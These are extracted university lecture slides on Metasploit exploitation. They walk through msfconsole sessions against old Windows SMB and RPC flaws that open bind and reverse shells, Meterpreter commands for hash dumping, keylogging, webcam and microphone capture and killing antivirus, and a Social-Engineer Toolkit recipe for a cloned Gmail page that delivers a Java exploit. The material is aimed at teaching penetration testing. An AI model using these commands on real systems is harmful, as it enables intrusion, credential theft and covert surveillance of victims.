Network Security Metasploit

Osman SALEM Matre de Confrences

Exploitation

Using any unauthorized tools will get you fired/arrested/deported/smited by God, etc... This course is not intended to make you a cracker

Just a small hacker to understant the importance of patches

You are the only responsible for misuse of these tools

Exploitation

Once on a network, how to find vulnerability ?

Vulnerability scanner tools System penetration through vulnerability exploitation

How to get access ?

Target weak servers first to test boxes

Less likely to be patched

Steal passwords Set up relays etc. what it is capable of providing ?
3

Get access to:

So, what is Metasploit Framework?

Many Attack Vectors!

Gaining access to a secured system is a difficult task

requires skill and may be luck

However, the most dangerous and very effective attacks used by malicious users today are

Software exploitation attacks! Social engineering

Software Exploitation Attacks can be used to gain access to unauthorized systems:

Installation of malicious software (Spyware, Viruss, Trojans, Adware, etc.)

4

Understanding S.E. Attacks.

First, lets understand basics

The word vulnerability, in computer security, refers to a weakness in a

system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts

To Software Developers, a bug is synonymous to a vulnerability

Ex: Errors in programs source code or flawed program design

Buffer overflows Memory leaks Dead locks Arithmetic overflow Accessing protected memory (Access Violation) etc.

Exploitation Exploits

Regardless the type of software bug we are speaking of Triggers an unexpected condition in program

generating an event that the program is not designed to recover successfully Redirect execution in a controlled way to run the payload The payload is a sequence of code that is executed when the vulnerability is triggered

To make things clear, an Exploit is really broken up into two parts: EXPLOIT = Vulnerability + Payload

Understanding Payloads

The payload is usually written in Assembly Language Platform and OS dependant

A Win32 payload will not work in Linux (even if we are exploiting the same bug) exec Execute a command or program on the remote system download_exec Download a file from a URL and execute upload_exec Upload a local file and execute adduser Add user to system accounts Unix /bin/sh Win command prompt cmd.exe Bind Shells and reverse Shells

Different payload types exist and they accomplish different tasks

The most common payload

Two different types of shell payloads

Auxialiaries & encoders

Auxialiaries:

Scanning, sniffing, fingerprinting, etc.

Encoders

Evades detection by antivirus, firefwall, IDS, IPS, etc. Encodes the payload during penetration operation

Metasploit Framework

What is the Metasploit Framework?

The Metasploit Framework is a platform for writing, testing, and using exploit code.

Provides simplified method for launching dangerous attacks

Set of exploits to launch against a box Potentially own the box Build a real exploit for your own purposes

General interface for testing & writing exploit Will not make you a cracker

MSFConsole

Most efficient, powerful, and all-in-one centralized frontend interfaces For penetration testers to use metasploit

$ cd /pentest/exploits/framework/ $ ./msfconsole $ msf > help $ show exploits $ show payloads $ show encoders $ show -h

10

MSFConsole

$ ./msfconsole $ msf > use exploit/windows/smb/ms08_067_netapi $ msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

PAYLOAD => windows/shell/bind_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:41289 -> 192.168.0.7:4444) at Sat Nov 13 19:01:23 +0000 2010 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 11

MSFConsole

12

Exploitation Metasploit
Metasploit: getting a shell

13

Exploitation Metasploit

14

Exploitation Meterpreter

Take many actions

Upload/download files Read/write to registry Change file access times Execute programs

15

Exploitation Exploits

Modern exploits work best

ms08-067 October 2008 (1/3 machines still vuln) ms03-026 September 2003

Used by MS Blaster Used by Sasser

ms04-011 April 2004

16

MSFConsole

$ ./msfconsole $ msf > use exploit/windows/smb/ms08_067_netapi $ msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(ms08_067_netapi) show options msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3

msf exploit(ms08_067_netapi) > exploit

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>

Essayer le payload: set PAYLOAD windows/vncinject/reverse_tcp

set RHOST & set LHOST

17

MSFConsole

$ ./msfconsole $ msf > use exploit/windows/dcerpc/ms03_026_dcom $ msf exploit(ms03_026_dcom) > show options msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms03_026_dcom) > set LHOST 192.168.1.10 msf exploit(ms03_026_dcom) > set RHOST 192.168.1.17 msf exploit(ms03_026_dcom) > exploit

18

MSFConsole

$ ./msfconsole $ msf > use exploit/windows/browser/ms10_046_icon_dllloader $ msf exploit(ms10_046_icon_dllloader) > show options msf exploit(ms10_046_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_046_icon_dllloader) > set LHOST 192.168.1.10 msf exploit(ms08_067_netapi) > exploit In browser of victime, enter the IP address of the attacker

19

MSFConsole

msf > use exploit/windows/smb/ms10_061_spoolss msf exploit(ms10_061_spoolss) > show payloads msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS] msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP] msf exploit(ms10_061_spoolss) > exploit

20

10

Information gathering

nslookup www.mi.parisdescartes.fr nslookup

set type=mx mi.parisdescartes.fr

whois h whois.ripe.net 193.48.xx.YY Netcraft: http://searchdns.netcraft.com

nmap sS Pn 192.168.1.18 nmap sS Pn A 192.168.1.18

TCP idle scan

msf msf msf msf msf msf

> use auxiliary/scanner/ip/ipidseq auxiliary(ipidseq) > show options auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24 auxiliary(ipidseq) > set THREADS 50 auxiliary(ipidseq) > run auxiliary(ipidseq) > nmap -PN -sI 192.168.1.109 192.168.1.155

21

Exploitation Meterpreter

Meterpreter

A Metasploit payload Injects itself into target process as a .dll To cover your tracks

22

11

MSFConsole

msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7

msf exploit(ms08_067_netapi) > show payloads ... msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options ... msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3

msf exploit(ms08_067_netapi) > exploit

[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1029)

meterpreter > help meterpreter > getuid meterpreter > sysinfo

23

MSFConsole

meterpreter > run hashdump meterpreter > ps meterpreter > migrate 3172 meterpreter > getpid meterpreter > getuid meterpreter > use_priv (to enable keystroke, you must load priv extension) meterpreter > keyscan_start //(keystroke) meterpreter > keyscan_dump meterpreter > keyscan_stop meterpreter > screenshot meterpreter > shell meterpreter > run vnc meterpreter > run killav (to kill the antivirus)

24

12

Exploitation Meterpreter

Acts as ordinary payload

25

SET : Social-Engineer Toolkit

13

SET uses Metasploit

There is a "social engineering" aspect in most hacking Tricking a user into making a mistake, that lets you in

Clicking a link Ignoring an error message Opening an attachment etc. Target: Win 7 Vuln: Java 0-Day

Today's Attack

Evil Web Server Attacker: Evil Web Server with Cloned Gmail Page

Java Exploit Code Added to Web Page

Target Using Gmail

14

Social Engineering

http://www.secmaniac.com/blog/2011/01/01/bypass-windows-uac/

Commands
cd /pentest/exploits/SET ./set Enter option 1: Social Engineering Attacks Enter option 2: Website Attack Vectors Enter option 1: The Java Attack Method Enter option 2: Site Cloner Enter url https://gmail.com It asks you "What payload do you want to generate:" and lists 11 choices It shows a list of 16 encodings to try and bypass AV.
Press Enter for default Press Enter for default Enter no Press Enter for default: 2. (Windows Reverse_TCP Meterpreter)

It asks you to "Enter the PORT of the listener (enter for default): It asks you whether you want to create a Linux.OSX reverse_tcp payload. It now shows blue text saying:
[*] Launching MSF Listener... [*] This may take a few to load MSF...

Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message:
msf exploit(handler) >

15

Commands

GAME OVER
The target is now owned. We can

Capture screenshots Capture keystrokes Turn on the microphone and listen Turn on the webcam and take photo Steal password hashes etc.

16

Fun & Games

To remotely control the target:

sessions -i 1 screenshot keyscan_start keyscan_stop record_mic 10 webcam_list webcam_snap 1

Commands to try:

The Usual Stuff

This stuff is all helpful

Get Antivirus Install patches (when they exist) Keep image-based backups so you can recover after an infection

But none of it can really save you

17

Attack > Defense

Even corporate desktop computers are infected The Chinese got into Google and >30 other huge companies last year Don't imagine you are immune

18